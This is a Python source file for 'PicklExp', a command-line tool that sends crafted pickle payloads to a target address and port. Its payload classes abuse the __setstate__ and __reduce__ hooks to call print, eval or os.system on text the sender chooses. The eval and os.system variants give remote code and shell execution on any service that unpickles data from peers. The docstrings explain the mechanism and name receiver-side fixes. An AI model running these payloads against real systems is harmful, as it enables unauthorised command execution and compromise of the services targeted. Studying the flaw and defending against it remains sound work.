#BSD 3-Clause, (C) Alfred Manville 2022
#Be RESPONSIBLE when using this!
import networker as net
import pickle
import traceback
import sys
#Payloads:
#State payloads only work if the payload class is importable at the target: pickle records a class by module and name and looks it up when loading
class StatePXP:
    """Print-only probe that runs through the ``__setstate__`` hook.

    Unpickling an instance makes the loading process call ``__setstate__``,
    which prints the carried text. It demonstrates that ``pickle.loads``
    executes class-defined code, so a receiver that unpickles peer-supplied
    bytes is running that peer's logic. Receivers avoid this by using a
    data-only format, or by overriding ``pickle.Unpickler.find_class`` with
    an allow-list.
    """

    def __init__(self, data):
        # Text the loading side will print when the state is restored.
        self.data = data

    def __getstate__(self):
        # The pickled state is the bare value, not the instance __dict__.
        carried = self.data
        return carried

    def __setstate__(self, state):
        # Invoked by pickle while the object is being rebuilt on load.
        self.data = state
        print(state)
class ReducePXP:
    """Print-only probe that runs through the ``__reduce__`` hook.

    ``__reduce__`` tells pickle to rebuild the object by calling a callable
    with an argument tuple. Here that callable is the builtin ``print``, so
    loading the pickle prints the carried text and yields ``None`` in place
    of an instance. The stream references only a builtin, which is why an
    allow-list in ``pickle.Unpickler.find_class`` is the relevant control on
    the receiving side.
    """

    def __init__(self, data):
        # Text handed to print() when the pickle is loaded.
        self.data = data

    def __reduce__(self):
        # (callable, args): the unpickler calls callable(*args) on load.
        call_args = (self.data,)
        return (print, call_args)
class StateEXP:
    """Variant of the state probe that evaluates its state on load.

    Same shape as ``StatePXP``, except that ``__setstate__`` passes the
    restored value to ``eval``. Whatever process unpickles an instance
    therefore evaluates a Python expression chosen by the sender. This is
    the reason pickle must never be used on data that crosses a trust
    boundary.
    """

    def __init__(self, data):
        # Expression text that will be evaluated on the loading side.
        self.data = data

    def __getstate__(self):
        # The pickled state is the bare expression string.
        expression = self.data
        return expression

    def __setstate__(self, state):
        # Invoked by pickle during load.
        self.data = state
        # SECURITY: eval() on a value taken straight from the pickle stream,
        # evaluated in this method's frame (so ``self`` and ``state`` are visible).
        eval(state)
class ReduceEXP:
    """Variant of the reduce probe whose reconstruction callable is ``eval``.

    Loading the pickle makes the unpickler call ``eval`` on the carried
    string. The stream names only a builtin, so the payload class does not
    need to exist on the loading side. A receiver that restricts
    ``pickle.Unpickler.find_class`` to an allow-list rejects it at lookup.
    """

    def __init__(self, data):
        # Expression text handed to eval() when the pickle is loaded.
        self.data = data

    def __reduce__(self):
        # SECURITY: (eval, args) means the loading process evaluates
        # sender-chosen text.
        call_args = (self.data,)
        return (eval, call_args)
class ReduceSXP:
    """Variant of the reduce probe whose reconstruction callable is ``os.system``.

    Loading the pickle makes the unpickler call ``os.system`` with the
    carried string, so the loading process runs a shell command line with
    its own privileges. On the receiving side this shows up as the service
    spawning a shell child process; ``pickle.Unpickler.find_class``
    allow-listing stops it before the call.
    """

    def __init__(self, data):
        # Command-line text handed to os.system() when the pickle is loaded.
        self.data = data

    def __reduce__(self):
        # Imported locally so the module itself does not depend on os.
        from os import system as run_shell

        # SECURITY: (os.system, args) means the loading process executes
        # sender-chosen shell text.
        return (run_shell, (self.data,))
# One instance of every payload class; the command line selects one by its
# 1-based position in this tuple and then fills in its data.
payloads = (
    StatePXP(""),
    ReducePXP(""),
    StateEXP(""),
    ReduceEXP(""),
    ReduceSXP(""),
)

# Run settings. These are placeholders: the __main__ block assigns the real
# values and main() reads them as module globals.
payload = None  # selected entry of ``payloads``
taddr = ""      # target address
tport = 0       # target port
plid = 0        # zero-based index into ``payloads``
pldata = ""     # text stored on the selected payload
def onx(a):
    """Do nothing; placeholder one-argument callback for ``net.Connection``.

    main() passes this as the third and fifth constructor arguments.
    NOTE(review): which events those slots stand for is defined by the
    networker module, not visible here — confirm there.
    """
    return None
def ony(a, m):
    """Do nothing; placeholder two-argument callback for ``net.Connection``.

    main() passes this as the fourth constructor argument.
    NOTE(review): presumably invoked with a peer address and a received
    message, judging by the parameter names — confirm in networker.
    """
    return None
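def main():
    """Open one connection to the configured endpoint and send the payload.

    Reads the module globals ``taddr``, ``tport``, ``payload`` and
    ``pldata`` set by the ``__main__`` block. Takes no arguments and
    returns ``None``; failures are printed as a traceback, not raised.

    NOTE(review): ``net.PickleTranslate`` presumably serialises the object
    with pickle, so the receiving service unpickles it — confirm in
    networker. A receiver built that way executes whatever the payload's
    ``__setstate__``/``__reduce__`` hook names. The fix belongs on the
    receiver: a data-only wire format, or an allow-listing
    ``pickle.Unpickler.find_class``.
    """
    conn = net.Connection(None, net.PickleTranslate(), onx, ony, onx)
    print("Running Exploit @ " + taddr + ":" + str(tport))
    print("Exploit: " + str(type(payload)) + " ; Data: " + pldata)
    try:
        conn.connect((taddr, tport))
        print("Exploiting...")
        conn.send(taddr + ":" + str(tport), payload)
        # Only means send() returned without raising; nothing here confirms
        # that the remote side actually loaded the object.
        print("Exploited!")
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C and SystemExit are not
        # swallowed; ordinary errors are still reported, not raised.
        print(traceback.format_exc())
    finally:
        # Always release the connection, whichever path was taken. The
        # original trailing bare ``exit`` was a no-op expression and is dropped.
        conn.close()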
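if __name__ == "__main__":
    print("Python PicklExp (C) Alfred Manville 2022 BSD-3-Clause")

    # Each setting is taken from the command line when supplied, otherwise
    # prompted for, in the order: address, port, payload position, data.
    cli_args = sys.argv[1:]

    taddr = cli_args[0] if len(cli_args) > 0 else input("Enter the target address: ")
    tport = int(cli_args[1] if len(cli_args) > 1 else input("Enter the target port: "))

    # Positions are 1-based for the user and 0-based internally.
    plid = int(
        cli_args[2]
        if len(cli_args) > 2
        else input("Enter the payload position " + str(payloads) + " : ")
    ) - 1
    # Reject out-of-range positions explicitly. Without this check a position
    # of 0 or below becomes a negative index and silently selects a payload
    # from the end of the tuple (0 picks the os.system one).
    if not 0 <= plid < len(payloads):
        sys.exit("Payload position must be between 1 and " + str(len(payloads)))

    pldata = cli_args[3] if len(cli_args) > 3 else input("Enter the payload data: ")

    payload = payloads[plid]
    payload.data = pldata
    main()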